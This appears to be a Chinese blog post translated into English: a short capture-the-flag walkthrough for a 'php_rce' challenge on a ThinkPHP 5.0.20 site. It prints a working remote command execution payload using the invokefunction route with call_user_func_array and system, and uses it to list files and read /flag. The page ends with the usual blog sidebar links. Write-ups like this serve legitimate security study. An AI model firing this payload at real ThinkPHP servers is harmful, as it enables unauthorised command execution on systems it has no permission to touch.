当前位置:网站首页>Attack and defense world web master advanced area PHP_ rce
Attack and defense world web master advanced area PHP_ rce
2022-07-29 00:17:00 【Ant200】
Tools
firefox
1. Open the link , Observed that this is a Think PHP V5 frame

2. Try typing index.php, Found that the page did not change , Continue to input the next level file ( Input at will ), Found out the version 5.0.20

3. Query the vulnerability of the relevant version ( Baidu or github) You can try 、
Query to the payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
Put it in and try to find something you can use

ls It's a system command , We just need to change the system command to open flag Just file
structure payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

4. The query is successful , find flag.
Relevant boss resources :
Attack and defend the world web Advanced master php_rce, Attack and defend the world web Master advanced area 1-5 2020.6.11_ Hazelnut is on the glowing blog -CSDN Blog
php Command execution exploit ,ThinkPHP 5.0 & 5.1 Remote command execution vulnerability analysis _AI Zhongzhi new media a Rong's blog -CSDN Blog
边栏推荐
- Erc20 Standard Code
- JS four formulas for judging data types
- 【MySQL 8】Generated Invisible Primary Keys(GIPK)
- 【TA-霜狼_may-《百人计划》】美术2.2 模型基础
- MySQL installation and configuration tutorial (super detailed, nanny level)
- ACM SIGIR 2022 | interpretation of selected papers of meituan technical team
- Powercl batch creates and manages virtual switches
- ES6 operation tutorial
- #{}和${}的区别
- Please briefly describe the respective characteristics of list, set and map type sets (briefly describe three different inheritance methods)
猜你喜欢

VMware VCSA 7.0 Install

[TA frost wolf \u may - "hundred people plan"] Figure 3.6 texture compression - inclusion slimming

Feign call fails. JSON parse error illegal character ((ctrl-char, code 31)) only regular white space (R

Pycharm configuring the running environment

【小程序项目开发 -- 京东商城】uni-app 商品分类页面(上)

JS advanced ES6 ~ es13 new features

With the help of rpa+lcap, the enterprise treasurer management can be upgraded digitally

CANoe应用案例之DoIP通信

Web系统常见安全漏洞介绍及解决方案-CSRF攻击

MySQL安装配置教程(超级详细、保姆级)
随机推荐
Powercli VMware vCenter deploys conventional new VMS in batch through self built PXE server with one click
1-7 解决类中方法的this指向问题
【MySQL 8】Generated Invisible Primary Keys(GIPK)
Doip test development practice
NPM replace the latest Taobao image
【C】替换空格,宏实现整数的二进制奇偶位交换
Worthington - chemical properties and related studies of Worthington trypsin
Do like and in indexes in MySQL go
VMware VCSA 7.0 Install
Real time data warehouse: Netease strictly selects the practice of real-time data warehouse based on Flink
Laptop external display
110道 MySQL面试题及答案 (持续更新)
【TA-霜狼_may-《百人计划》】图形3.6 纹理压缩——包体瘦身术
Leetcode59. Spiral matrix II
2022网络安全学习路线 非常详细 推荐学习
curl (7) Failed connect to localhost8080; Connection refused
Linux之yum安装MySQL
Everything you have learned will come in handy at some point in your life (turn)
Visual full link log tracking
Es6操作教程